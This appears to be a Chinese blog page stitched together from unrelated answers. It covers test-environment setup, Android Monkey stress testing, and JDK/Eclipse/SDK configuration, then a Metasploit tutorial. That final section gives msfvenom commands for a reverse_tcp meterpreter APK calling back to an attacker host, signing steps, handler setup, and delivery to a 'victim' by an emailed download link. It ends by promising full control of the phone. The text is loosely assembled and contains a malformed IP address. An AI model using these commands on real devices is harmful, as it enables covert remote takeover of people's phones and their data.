安卓手机渗透测试工具_搭建安卓手机渗透测试环境

hacker|
130

测试需要自己搭建测试环境吗?

需要。

1)从岗位职责的要求上,一般测试人员要能够搭建基本的测试环境。软件测试的基础知识,你可以看黑马程序员视频

2)如果是常规的,通用的基础环境要求能够自行搭建,比如WAMP这种。如果公司对于环境有特殊要求,那么要能够根据公司提供的相应的文档资料,操作说明,进行环境的搭建。

3)对于较为复杂的环境问题,在工作中可以向开发和运维人员进行适当求助。

android测试monkey什么意思

Monkey是Android中自带的用来进行压力测试的一个命令行工具。

用Monkey进行App压力测试的结果有三种。

1、正常。

2、Crash :程序崩溃。

3、ANR:程序无响应。

第一步:搭建环境:主要是安装和搭建java和sdk环境,说白了,对我们安卓开发来说,只要搭建好了Android开发环境,Monkey测试环境基本就是OK的了。

第二步:准备好要测试的项目,比如可以是一个.apk安装包,也可以是已经安装到手机上的软件 。

第三步:连接上Android测试设备,可以是模拟器,当然也可以是手机,通过adb 命令对测试项目进行Monkey测试。

当然这一测试也是存在着优缺点的。

优点:功能强大, 主要用于压力和稳定性测试。缺点:本身不提供截屏功能,本身无法完成录制、回放的功能(不过都可以借用其他的开源工具来实现Monkey的截屏和录制等功能)。

android开发环境搭建

Android开发环境搭建分为五个步骤来完成Android开发环境的部署。

第一步:安装JDK

要下载Oracle公司的JDK可以百度“JDK”进入Oracle公司的JDK下载页面(当前下载页面地址为),选择自己电脑系统的对应版本即可。

第二步:配置Windows上JDK的变量环境

知道了一个应用程序的安装目录位置,我们也可以通过命令行工具打开,如QQ的位置为:C:\Program Files (x86)\Tencent\QQ\QQProtect\Bin,QQ的应用程序名为为QQProtect.exe,那么我们打开命令行工具,然后进入到“C:\Program Files (x86)\Tencent\QQ\QQProtect\Bin”目录,再输入“QQProtect”,即可运行qq。

JAVA_HOME

先设置这个系统变量名称,变量值为JDK在你电脑上的安装路径:C:\Program Files\Java\jdk1.8.0_20。创建好后则可以利用%JAVA_HOME%作为JDK安装目录的统一引用路径。

Path

PATH属性已存在,可直接编辑,在原来变量后追加:;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin 。

CLASSPATH

设置系统变量名为:CLASSPATH  变量值为:.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar 。

注意变量值字符串前面有一个"."表示当前目录,设置CLASSPATH 的目的,在于告诉Java执行环境,在哪些目录下可以找到您所要执行的Java程序所需要的类或者包。

第三步: 下载安装Eclipse

Eclipse为Java应用程序及Android开发的IDE(集成开发环境)。Eclipse不需要安装,下载后把解压包解压后,剪切eclipse文件夹到你想安装的地方,打开时设置你的工作目录即可。

Eclipse的版本有多个,这里选择下载Eclipse IDE for Java EE Developers这个版本。

第四步:下载安装Android SDK

Android SDK提供了开发Android应用程序所需的API库和构建、测试和调试Android应用程序所需的开发工具。

打开,我们发现google提供了集成了Eclipse的Android Developer Tools,因为我们这次是已经下载了Eclipse,所以我们选择单独下载Android SDK

下载后双击安装,指定Android SDK的安装目录,为了方便使用Android SDK包含的开发工具,我们在系统环境变量中的Path设置Android SDK的安装目录下的tools目录。

第五步:为Eclipse安装ADT插件

下面是在线安装ADT的方法:

启动Eclipse,点击 Help菜单 - Install New Software… ?,点击弹出对话框中的Add… 按钮。

然后在弹出的对话框中的Location中输入:,Name可以输入ADT,点击“OK”按钮。

在弹出的对话框选择要安装的工具,然后下一步就可以了。

如何使用Metasploit对安卓手机进行控制

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

这是我们切换到安卓模拟器。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像,启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali,我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

0条大神的评论

发表评论